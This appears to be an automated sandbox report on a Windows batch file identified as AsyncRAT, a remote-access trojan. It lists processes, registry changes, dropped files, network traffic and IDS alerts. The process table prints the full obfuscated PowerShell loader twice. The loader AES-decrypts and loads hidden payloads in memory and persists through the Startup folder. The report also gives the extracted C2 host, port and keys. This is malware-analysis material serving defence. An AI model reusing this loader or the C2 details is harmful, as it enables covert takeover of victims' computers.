File name: | Network51488Man.cmd |
Full analysis: | https://app.any.run/tasks/38a5737a-2e89-4b7b-9974-823ee42540dc |
Verdict: | Malicious activity |
Threats: | AsyncRAT is a RAT that can monitor and remotely control infected systems. This malware was introduced on Github as a legitimate open-source remote administration software, but hackers use it for its many powerful malicious functions. |
Analysis date: | February 25, 2024, 22:22:37 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/x-msdos-batch |
File info: | DOS batch file, ASCII text, with very long lines (44738), with CRLF line terminators |
MD5: | CE7305B62B33A0CEA11C8FA5341D9D83 |
SHA1: | F91DC280A08923464B62DBA8080FC6F8B04C0989 |
SHA256: | C7EE86E20E53E76697BDF825598467EDFCAF31B11D35B684D941F53135476B62 |
SSDEEP: | 1536:cYplvyBliMahVXCJQ/nOiWRqBiMOyhXEoPQXsVGXY:LPDMafXh/nFdBiWhnQXsVGXY |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1348 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
2648 | C:\Windows\system32\cmd.exe /K "C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network51488Man.cmd" | C:\Windows\System32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
3464 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
3656 | C:\Windows\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\Network51488Man.cmd" " | C:\Windows\System32\cmd.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
3732 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
3892 | C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\admin\AppData\Local\Temp\Network51488Man.cmd';$Dzbu='ECfdYleCfdYmeCfdYnCfdYtACfdYtCfdY'.Replace('CfdY', ''),'TapzxraapzxnsapzxfoapzxrmFapzxiapzxnapzxalapzxBlapzxocapzxkapzx'.Replace('apzx', ''),'GEEVaetEEVaCEEVaurrEEVaenEEVatPrEEVaocEEVaesEEVasEEVa'.Replace('EEVa', ''),'CrlqWdeatlqWdelqWdDlqWdelqWdcrylqWdplqWdtorlqWd'.Replace('lqWd', ''),'FrrvQQorvQQmBrvQQaservQQ6rvQQ4rvQQStrvQQrinrvQQgrvQQ'.Replace('rvQQ', ''),'RexTVjadxTVjLixTVjnesxTVj'.Replace('xTVj', ''),'LoaFuJudFuJu'.Replace('FuJu', ''),'DHfIYeHfIYcHfIYomHfIYpHfIYrHfIYeHfIYssHfIY'.Replace('HfIY', ''),'ExAHHntrxAHHyPxAHHoxAHHixAHHntxAHH'.Replace('xAHH', ''),'CsXNZopysXNZTsXNZosXNZ'.Replace('sXNZ', ''),'CAqgnhaAqgnngAqgneEAqgnxteAqgnnsiAqgnonAqgn'.Replace('Aqgn', ''),'MaiDvdiniDvdModiDvduliDvdeiDvd'.Replace('iDvd', ''),'SwhcWplwhcWiwhcWtwhcW'.Replace('whcW', ''),'InHdJjvoHdJjkeHdJj'.Replace('HdJj', '');powershell -w hidden;function reHfm($rKEKq){$aEwnS=[System.Security.Cryptography.Aes]::Create();$aEwnS.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aEwnS.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aEwnS.Key=[System.Convert]::($Dzbu[4])('T1uYPvbPmfU/Tl9JLt1BT08sOlsuwY6yjvoB0BwO+BQ=');$aEwnS.IV=[System.Convert]::($Dzbu[4])('A2uVMx4c3kCtodFaVjejsw==');$kOYZg=$aEwnS.($Dzbu[3])();$aUGtU=$kOYZg.($Dzbu[1])($rKEKq,0,$rKEKq.Length);$kOYZg.Dispose();$aEwnS.Dispose();$aUGtU;}function Cxkwh($rKEKq){$odnrl=New-Object System.IO.MemoryStream(,$rKEKq);$IQRBp=New-Object System.IO.MemoryStream;$ZYOVN=New-Object System.IO.Compression.GZipStream($odnrl,[IO.Compression.CompressionMode]::($Dzbu[7]));$ZYOVN.($Dzbu[9])($IQRBp);$ZYOVN.Dispose();$odnrl.Dispose();$IQRBp.Dispose();$IQRBp.ToArray();}$RoIKs=[System.IO.File]::($Dzbu[5])([Console]::Title);$iPcPt=Cxkwh (reHfm ([Convert]::($Dzbu[4])([System.Linq.Enumerable]::($Dzbu[0])($RoIKs, 5).Substring(2))));$fQYaW=Cxkwh (reHfm ([Convert]::($Dzbu[4])([System.Linq.Enumerable]::($Dzbu[0])($RoIKs, 6).Substring(2))));[System.Reflection.Assembly]::($Dzbu[6])([byte[]]$fQYaW).($Dzbu[8]).($Dzbu[13])($null,$null);[System.Reflection.Assembly]::($Dzbu[6])([byte[]]$iPcPt).($Dzbu[8]).($Dzbu[13])($null,$null); " | C:\Windows\System32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
3960 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
AsyncRat(PID) Process(3960) powershell.exe C2 (1)pirtana.mywire.org Ports (1)116 Botnetpirate VersionAWS | 3Losh Options AutoRunfalse Mutexpirate InstallFolder%AppData% BSoDfalse AntiVMfalse Certificates Cert1MIIE8jCCAtqgAwIBAgIQAPeWQ4YJ3MvReCGwLzn7rTANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjIwNDI1MDA0MTA5WhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAKT9nYYTjYTZhY+g1tekZ8/F29gsEIDgf/8odvCbCmYKGGZZi2yND9NjtBXEMANM9PAXCyMapGva... Server_SignaturenVkDbegqk0N63pwZQX7yAHSchbWjkQEr0f5Aukq2qSzYvm9xxSbdcXSdIp6ceVj9wibFN4n0YFPMwiMepipZMn4afUFUrCBsys13XSuq0EHFmjnJ3dKRXJoc7Le0kdX0rAAUxH1p9fFjnRaeS1lqxy80vJpVzfilpIhMZ+yl7/pKaWLluA87R7sGIV33IOeRsg1/K3WoiH+9GdhJ8MnDZl4GSsWuao7U0y5Kjoopmt3759eBabP2yuuxIVTbsoR8ct4lNnhIcUoUDU6QedZCaMMR5YyyYfFH8Z2IcDnQXBAB... Keys AES941dd77429558e8238a0fa619ad978dad6301d6aceb1f60a40df36a6f4d170cd Saltbfeb1e56fbcd973bb219022430a57843003d5644d21e62b9d4f180e7e6c33941 | |||||||||||||||
3972 | C:\Windows\system32\cmd.exe /K "C:\Users\admin\AppData\Local\Temp\Network51488Man.cmd" | C:\Windows\System32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
4000 | C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network51488Man.cmd';$Dzbu='ECfdYleCfdYmeCfdYnCfdYtACfdYtCfdY'.Replace('CfdY', ''),'TapzxraapzxnsapzxfoapzxrmFapzxiapzxnapzxalapzxBlapzxocapzxkapzx'.Replace('apzx', ''),'GEEVaetEEVaCEEVaurrEEVaenEEVatPrEEVaocEEVaesEEVasEEVa'.Replace('EEVa', ''),'CrlqWdeatlqWdelqWdDlqWdelqWdcrylqWdplqWdtorlqWd'.Replace('lqWd', ''),'FrrvQQorvQQmBrvQQaservQQ6rvQQ4rvQQStrvQQrinrvQQgrvQQ'.Replace('rvQQ', ''),'RexTVjadxTVjLixTVjnesxTVj'.Replace('xTVj', ''),'LoaFuJudFuJu'.Replace('FuJu', ''),'DHfIYeHfIYcHfIYomHfIYpHfIYrHfIYeHfIYssHfIY'.Replace('HfIY', ''),'ExAHHntrxAHHyPxAHHoxAHHixAHHntxAHH'.Replace('xAHH', ''),'CsXNZopysXNZTsXNZosXNZ'.Replace('sXNZ', ''),'CAqgnhaAqgnngAqgneEAqgnxteAqgnnsiAqgnonAqgn'.Replace('Aqgn', ''),'MaiDvdiniDvdModiDvduliDvdeiDvd'.Replace('iDvd', ''),'SwhcWplwhcWiwhcWtwhcW'.Replace('whcW', ''),'InHdJjvoHdJjkeHdJj'.Replace('HdJj', '');powershell -w hidden;function reHfm($rKEKq){$aEwnS=[System.Security.Cryptography.Aes]::Create();$aEwnS.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aEwnS.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aEwnS.Key=[System.Convert]::($Dzbu[4])('T1uYPvbPmfU/Tl9JLt1BT08sOlsuwY6yjvoB0BwO+BQ=');$aEwnS.IV=[System.Convert]::($Dzbu[4])('A2uVMx4c3kCtodFaVjejsw==');$kOYZg=$aEwnS.($Dzbu[3])();$aUGtU=$kOYZg.($Dzbu[1])($rKEKq,0,$rKEKq.Length);$kOYZg.Dispose();$aEwnS.Dispose();$aUGtU;}function Cxkwh($rKEKq){$odnrl=New-Object System.IO.MemoryStream(,$rKEKq);$IQRBp=New-Object System.IO.MemoryStream;$ZYOVN=New-Object System.IO.Compression.GZipStream($odnrl,[IO.Compression.CompressionMode]::($Dzbu[7]));$ZYOVN.($Dzbu[9])($IQRBp);$ZYOVN.Dispose();$odnrl.Dispose();$IQRBp.Dispose();$IQRBp.ToArray();}$RoIKs=[System.IO.File]::($Dzbu[5])([Console]::Title);$iPcPt=Cxkwh (reHfm ([Convert]::($Dzbu[4])([System.Linq.Enumerable]::($Dzbu[0])($RoIKs, 5).Substring(2))));$fQYaW=Cxkwh (reHfm ([Convert]::($Dzbu[4])([System.Linq.Enumerable]::($Dzbu[0])($RoIKs, 6).Substring(2))));[System.Reflection.Assembly]::($Dzbu[6])([byte[]]$fQYaW).($Dzbu[8]).($Dzbu[13])($null,$null);[System.Reflection.Assembly]::($Dzbu[6])([byte[]]$iPcPt).($Dzbu[8]).($Dzbu[13])($null,$null); " | C:\Windows\System32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
4008 | "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network51488Man.cmd" | C:\Windows\System32\cmd.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
|
(PID) Process: | (3732) powershell.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
(PID) Process: | (3732) powershell.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | IntranetName |
Value: 1 | |||
(PID) Process: | (3732) powershell.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
(PID) Process: | (3732) powershell.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 0 | |||
(PID) Process: | (3960) powershell.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E |
Operation: | write | Name: | LanguageList |
Value: en-US |
PID | Process | Filename | Type | |
---|---|---|---|---|
3732 | powershell.exe | C:\Users\admin\AppData\Local\Temp\mnysurnv.0l4.ps1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:— | |||
1348 | powershell.exe | C:\Users\admin\AppData\Local\Temp\53ntq0d4.2tj.ps1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:— | |||
3464 | powershell.exe | C:\Users\admin\AppData\Local\Temp\ychsk3wd.ybw.ps1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:— | |||
3732 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network51488Man.cmd | text | |
MD5:CE7305B62B33A0CEA11C8FA5341D9D83 | SHA256:C7EE86E20E53E76697BDF825598467EDFCAF31B11D35B684D941F53135476B62 | |||
3960 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | binary | |
MD5:6675EDE59684F4A119D2E5DA282AFBE6 | SHA256:5026C5EE8FA9ACB21718BF1FAD563C0A3FD5BC79327611FDF9C4ABD2647CE829 | |||
3960 | powershell.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | compressed | |
MD5:AC05D27423A85ADC1622C714F2CB6184 | SHA256:C6456E12E5E53287A547AF4103E0397CB9697E466CF75844312DC296D43D144D | |||
3464 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | binary | |
MD5:446DD1CF97EABA21CF14D03AEBC79F27 | SHA256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF | |||
3960 | powershell.exe | C:\Users\admin\AppData\Local\Temp\gg33qx4t.eft.ps1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:— | |||
3464 | powershell.exe | C:\Users\admin\AppData\Local\Temp\rutt0ccn.qov.psm1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:— | |||
3960 | powershell.exe | C:\Users\admin\AppData\Local\Temp\guefmuap.f4v.psm1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:— |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3960 | powershell.exe | GET | 200 | 93.184.221.240:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?5640091f244ed244 | unknown | compressed | 65.2 Kb | — |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
4 | System | 192.168.100.255:138 | — | — | — | unknown |
1080 | svchost.exe | 224.0.0.252:5355 | — | — | — | unknown |
4 | System | 192.168.100.255:137 | — | — | — | unknown |
3960 | powershell.exe | 168.119.211.236:116 | pirtana.mywire.org | Hetzner Online GmbH | UA | unknown |
3960 | powershell.exe | 93.184.221.240:80 | ctldl.windowsupdate.com | EDGECAST | GB | unknown |
Domain | IP | Reputation |
---|---|---|
pirtana.mywire.org |
| unknown |
ctldl.windowsupdate.com |
| unknown |
PID | Process | Class | Message |
---|---|---|---|
— | — | Potentially Bad Traffic | ET INFO DYNAMIC_DNS Query to a *.mywire .org Domain |
— | — | Domain Observed Used for C2 Detected | REMOTE [ANY.RUN] AsyncRAT SSL certificate |
— | — | Domain Observed Used for C2 Detected | ET MALWARE Generic AsyncRAT Style SSL Cert |
— | — | Domain Observed Used for C2 Detected | ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server) |
— | — | Malware Command and Control Activity Detected | REMOTE [ANY.RUN] AsyncRAT Successful Connection |